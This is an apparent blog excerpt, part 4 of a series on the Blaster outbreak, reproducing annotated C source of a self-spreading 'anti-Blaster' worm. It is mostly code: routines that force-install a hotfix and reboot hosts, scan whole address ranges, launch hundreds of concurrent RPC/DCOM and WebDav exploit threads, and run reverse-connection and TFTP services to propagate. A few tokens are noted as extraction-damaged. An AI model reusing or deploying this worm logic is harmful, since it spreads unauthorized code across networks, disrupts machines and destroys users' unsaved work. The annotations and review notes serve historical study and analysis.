冲击波病毒内幕点滴(4)



/*
 * Orchestration layer of the "anti-Blaster" worm discussed in this series
 * (it removes msblast and installs the RPC/DCOM hotfix; publicly this family
 * is usually identified as Welchia/Nachi — not confirmed by the excerpt itself).
 *
 * Everything this excerpt calls is defined elsewhere: Win2000OrXp,
 * ReadRegServicePack, DownloadSpFile, MakeProcess, ShutDownWindows, MakeRandIp,
 * ExploitWebDavThread, ExploitRpcDcomThread, KillMsblast, MyDeleteService,
 * MyStartService, InstallTftpService, RemoveMe, Press*BufferOnce,
 * CheckOnlienAndPressData, RecvSendCmdThread, and the globals szWin2kSpUrl,
 * szWinXPSpUrl, g_CurThreadCount, nMaxThread, pPingBuffer,
 * pWebDavExploitBuffer, szLocalIp, wdIpHead, szServiceName, szServiceTftpd.
 *
 * The blog published the code collapsed onto three lines.  Only line breaks
 * and indentation have been restored and the author's Chinese comments
 * translated; tokens are as published.  Three tokens look extraction-damaged
 * and are deliberately left alone: '/xAA' (presumably '\xAA'), "WSADATAwsd"
 * (presumably "WSADATA wsd") and "(L PVOID)" (presumably "(LPVOID)").
 */

/*
 * Download and run the vendor RPC/DCOM hotfix on the infected host, then
 * force a reboot if the registry shows the install took.
 *
 * Returns FALSE on an unsupported OS or locale, when the hotfix is already
 * recorded, on a download or launch failure, or when the installer does not
 * finish within six minutes; TRUE otherwise (even if the registry check after
 * the install fails — then no reboot is issued).
 *
 * Security-relevant points visible in this block:
 *   - the installer is fetched from a hard-coded URL table (szWin2kSpUrl /
 *     szWinXPSpUrl) and executed as-is; no hash or signature check sits
 *     between DownloadSpFile() and MakeProcess(), so whoever controls those
 *     hosts, or the network path to them, controls what runs here;
 *   - the reboot is EWX_REBOOT | EWX_FORCE, i.e. unsaved user work is lost.
 */
BOOL DoServicePackFunction()
{
    DWORD nSystemVer = Win2000OrXp();   // presumably 0 = Windows 2000, 1 = Windows XP (see the URL-table branch below)
    if ( !( nSystemVer == 0 || nSystemVer == 1) )
        return FALSE; // not 2k or xp
    if ( ReadRegServicePack(nSystemVer) )
        return FALSE; // already installed

    // Identify the language build of the hotfix from the OEM code page plus
    // the primary/sub language of the system LCID.  The author's tags (en,
    // cn, tw, jp, kr) are kept; the numeric values are Windows LANG_/SUBLANG_
    // identifiers.
    int nLanguageID;
    unsigned int unOemCP = GetOEMCP();
    LCID lcid = GetSystemDefaultLCID();
    WORD wMain = PRIMARYLANGID(lcid);
    WORD wSub = SUBLANGID(lcid);
    if ( unOemCP == 437 && wMain == 9 && wSub == 1 )         //en
        nLanguageID = 0;   // author: English hosts get the patch; other European locales are not handled here
    else if ( unOemCP == 936 && wMain == 4 && wSub == 2 )    //cn
        nLanguageID = 1;   // author: Simplified-Chinese hosts are the main reason this routine exists
    else if ( unOemCP == 950 && wMain == 4 && wSub == 1 )    //tw
        nLanguageID = 2;   // author: Traditional-Chinese hosts are patched as well
    else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp
        nLanguageID = -1;  // deliberately excluded by the author: Japanese-locale hosts are neither patched nor touched by this routine
    else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr
        nLanguageID = 3;   // author: Korean hosts are patched so fewer compromised machines abroad come back to hit domestic networks
    else{
        nLanguageID = -1;  // any other locale: nothing to do
    }
    if ( nLanguageID == -1)
        return FALSE;

    char szServicePack[] = "RpcServicePack.exe"; // download target, relative to the current directory
    if ( !nSystemVer ) { // 2k
        if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
            return FALSE;
    }
    else{
        if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
            return FALSE;
    }

    // "-n -o -z -q" are, presumably, the Microsoft hotfix installer switches
    // for an unattended, quiet install without an automatic reboot — confirm
    // against the installer.  The format is a fixed 18-character name plus
    // 12 characters of switches, so the 180-byte buffer cannot overflow.
    char szExec[180];
    sprintf(szExec, "%s -n -o -z -q", szServicePack);
    HANDLE hProcess = MakeProcess( szExec );
    if ( hProcess == NULL )
        return FALSE;  // NOTE(review): the downloaded installer is left on disk on this path
    if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ // not finished within six minutes
        TerminateProcess(hProcess,1);
        CloseHandle(hProcess);
        DeleteFile(szServicePack);
        return FALSE;
    }
    CloseHandle(hProcess);
    Sleep(15000);
    DeleteFile(szServicePack);
    if ( ReadRegServicePack(nSystemVer) ) {
        ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot it~~~
        Sleep(20000); // author: the patch is not effective until the host reboots
    }
    return TRUE;
}

/*
 * Scan nBCount /16 ("B") ranges and launch one exploit thread per candidate
 * address.
 *
 * IN: ulIpStart  first address, host byte order (ignored when bRand is set)
 *     nBCount    number of /16 ranges, i.e. nBCount * 65536 loop iterations
 *     bRand      take every address from MakeRandIp() instead of sequentially
 *     bWebDav    run ExploitWebDavThread instead of ExploitRpcDcomThread
 *
 * Concurrency is capped through the global g_CurThreadCount, which — per the
 * author's comment — is incremented by the exploit threads themselves, against
 * nMaxThread (300, again per the author's comment).  Author's own verdict on
 * this routine: "even worse — bear with it".
 */
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL bWebDav)
{
    HANDLE hThread = NULL;
    BOOL bFirst = TRUE;
    u_long uComp;
    for (int i=0;i< (nBCount * 256 * 256); i++){
        if ( bRand )
            uComp = MakeRandIp();
        else
            uComp = i + ulIpStart;
        // Skip any address that has an octet equal to 0xc5 (197) or two
        // adjacent octets equal to 0x99 0x99.  Author's reason: keep some
        // ranges off the target list so that an infected host does not later
        // knock out "the next generation"; better not to do damage.
        if (
            (BYTE)uComp == 0xc5 || (BYTE)(uComp>>8) == 0xc5 || (BYTE)(uComp>>16) == 0xc5 || (BYTE)(uComp>>24) == 0xc5 ||
            (WORD)uComp == 0x9999 || (WORD)(uComp>>8) == 0x9999 || (WORD)(uComp>>16) == 0x9999 )
            continue;
        u_long *myPara = new u_long;   // handed to the thread; presumably freed there (not visible in this excerpt)
        if ( myPara == NULL ){ // if the allocation fails, try once more
            // NOTE(review): standard C++ `new` throws on failure instead of
            // returning NULL, so this check only has an effect with a
            // non-throwing allocator — confirm the build settings.
            Sleep(100);
            myPara = new u_long;
        }
        if ( myPara ){
            if ( hThread )
                CloseHandle(hThread);   // releases the previous thread's handle; the last one is never closed after the loop (handle leak)
            *myPara = htonl( uComp);    // the thread receives the address in network byte order
            DWORD dwThreadId;
            if (bWebDav)
                hThread = CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId);
            else
                hThread = CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId);
            // NOTE(review): if CreateThread fails, myPara is leaked.
            Sleep(2);
        }
        // Added by the author to fix a bug: on the first pass the threads had
        // not yet run InterlockedIncrement(&g_CurThreadCount), so N threads
        // were created at once.  NOTE(review): this is a timing workaround,
        // not a fix — the throttle below still races the threads' increment.
        if ( bFirst && (i >= nMaxThread) ){
            Sleep(2000);
            bFirst = FALSE;
        }
        while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 — the author admits this is overdone
            Sleep(2);
    }
    Sleep(60000);   // presumably gives the last batch of threads time to finish before the caller moves on
}

/*
 * Main routine shared by service mode and console mode.  Sequence:
 *   1. WSAStartup; KillMsblast() — remove the Blaster worm.
 *   2. Kill switch: if the local clock says 2004, delete both services,
 *      RemoveMe() and exit.  NOTE(review): the test is `== 2004`, so a clock
 *      already at 2005 or later would not trigger retirement.
 *   3. Build the ICMP echo payload (pPingBuffer filled with one repeated
 *      byte — the author explicitly asks backbone routers to drop ICMP echo
 *      carrying this signature) and the WebDav / RPC-DCOM exploit buffers.
 *   4. DoServicePackFunction(); start RecvSendCmdThread (per the author it
 *      handles reverse connections from exploited hosts) and the tftpd
 *      service (presumably serving the worm body to them — not visible here).
 *   5. for(;;): own /16, three neighbouring /16s, one /16 from wdIpHead[]
 *      over WebDav, then a random batch; KillMsblast() each round.  Author's
 *      estimate: about two hours per round on an ordinary machine.
 * The loop never exits; WSACleanup() is commented out.
 */
void DoIt()
{
    WSADATAwsd;   // as published; reads as "WSADATA wsd;" with the space lost in extraction
    if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
        return;
    // kill the worm (Blaster)
    KillMsblast();
    // uninstall: self-retirement once the local year is 2004
    SYSTEMTIME st;
    GetLocalTime(&st);
    if ( st.wYear == 2004 ){
        MyDeleteService(szServiceName);
        MyDeleteService(szServiceTftpd);
        RemoveMe();
        ExitProcess(1); // author: not strictly needed — RemoveMe() reuses older code that deletes the executable on exit under Win2000
    }
    srand( GetTickCount() );
    // ICMP echo payload.  '/xAA' is as published and is a multi-character
    // constant as written; it is presumably an extraction-mangled '\xAA' —
    // confirm against the original.  Author's comment: asks backbone routers
    // to drop ICMP echo with this signature immediately; the domestic Blaster
    // outbreak is over and enough patching has been done.
    memset(pPingBuffer, '/xAA', sizeof(pPingBuffer));
    // Prepare the WebDav send buffer (spins until the allocation succeeds;
    // see the note on throwing `new` in BeginExploitFunction)
    do{
        pWebDavExploitBuffer = new char[68000];
        Sleep(100);
    }while(pWebDavExploitBuffer == NULL);
    // The payloads must be assembled once, before CheckOnlienAndPressData()
    PressWebDavBufferOnce();
    PressRpcDcomBufferOnce();
    CheckOnlienAndPressData(); // get the local IP & patch the reverse-connect ip/port into the payloads
    // patch the local host
    DoServicePackFunction();
    // start the receive thread
    DWORD dwThreadID;
    HANDLE hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L PVOID)NULL,0,&dwThreadID); // "(L PVOID)" as published; presumably "(LPVOID)" split in extraction
    if(hWorkThread==NULL) // author: RecvSendCmdThread blocks; on each reverse connection it spawns another thread, so several are served at once
        return;
    CloseHandle(hWorkThread);
    if ( !MyStartService(szServiceTftpd) ){
        Sleep(1000);
        InstallTftpService();
        Sleep(1000);
        MyStartService(szServiceTftpd);
    }
    Sleep(2000); // wait for the receive thread to pick its global random bind port
    u_long ulIP;
    for(;;){ // author's estimate: one full round takes about 2 hours on an ordinary machine
        // first scan the local /16
        CheckOnlienAndPressData();
        ulIP = ntohl(inet_addr(szLocalIp));
        ulIP &= 0xffff0000;
        BeginExploitFunction( ulIP, 1, 0, 0);
        // then the three /16s next to it (the one above, or the three below, at random)
        CheckOnlienAndPressData();
        if ( rand() % 2)
            ulIP += 0x00010000;
        else
            ulIP -= 0x00030000;
        BeginExploitFunction( ulIP, 3, 0, 0);
        // then one /16 over WebDav, to get past SYN filtering of port 135
        CheckOnlienAndPressData();
        ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); // wdIpHead[]: table of /16 prefixes (76 entries, presumably); the author addresses the broadband ISPs owning them and tells them to remediate
        BeginExploitFunction( ulIP, 1, 0, 1);
        // then random addresses, one /16's worth, RPC or WebDav at random
        CheckOnlienAndPressData();
        if ( rand() % 2)
            BeginExploitFunction( ulIP, 1, 1, 0);
        else
            BeginExploitFunction( ulIP, 1, 1, 1);
        // and around again
        KillMsblast();
    }
    //WSACleanup();
}

